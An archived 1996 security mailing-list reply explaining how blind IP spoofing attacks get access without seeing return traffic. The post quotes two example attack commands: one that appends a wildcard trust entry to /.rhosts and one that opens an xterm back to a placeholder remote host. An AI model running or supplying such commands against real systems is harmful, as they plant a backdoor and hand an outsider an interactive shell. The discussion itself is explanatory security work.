[1928] in WWW Security List Archive
Re: Restrictions group without ask for the password
daemon@ATHENA.MIT.EDU (Chris Garrigues)
Sun Apr 28 21:40:11 1996
To: Eric Wieling <ewieling@hephaestus.icorp.net>
Cc: adam@lighthouse.homeport.org (Adam Shostack), dmurray@pdssoftware.com,
www-security@ns2.rutgers.edu, cwg@deepeddy.DeepEddy.Com
In-Reply-To: Your message of "Sat, 27 Apr 1996 11:37:48 CDT."
<199604271637.LAA01081@hephaestus.icorp.net>
Date: Sun, 28 Apr 1996 18:12:00 -0500
From: Chris Garrigues <cwg@DeepEddy.Com>
Errors-To: owner-www-security@ns2.rutgers.edu
-----BEGIN PGP SIGNED MESSAGE-----
Content-Type: text/plain; charset=us-ascii
> I'm not an expert in the matter, but I wonder how ACK packets and
> return data gets back to the machine doing the IP spoofing?
They don't. The spoofing machine assumes that the packets are ACK'd and it
sends messages which open up other holes through which it can actually send
the data back again. For instance, it might send the equivalent of "echo + >>
/.rhosts" or "xterm -display wherever.edu:0". The acknowlegement of the
former would be the newly found ability to rsh to the machine. The
confirmation of the latter would be the window appearing on the local screen.
Chris
- --
Chris Garrigues O- cwg@DeepEddy.Com
Deep Eddy Internet Consulting +1 512 432 4046
609 Deep Eddy Avenue
Austin, TX 78703-4513 http://www.DeepEddy.Com/~cwg/
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQB1AwUBMYP7O5aQnaaFII2dAQE5UAL+JvabaTQFJ1mBdQCD1PCQoRkz/xp4ltHk
ROudZRLQlQXLKU8sOytI2/awgiNsFiWkLuXbnqt+5kVuZV1ZytlqV1e8ztVBpMTj
aK+7hTQiT79HQLGIZHsQW2Jc3hpSv8re
=OYop
-----END PGP SIGNATURE-----
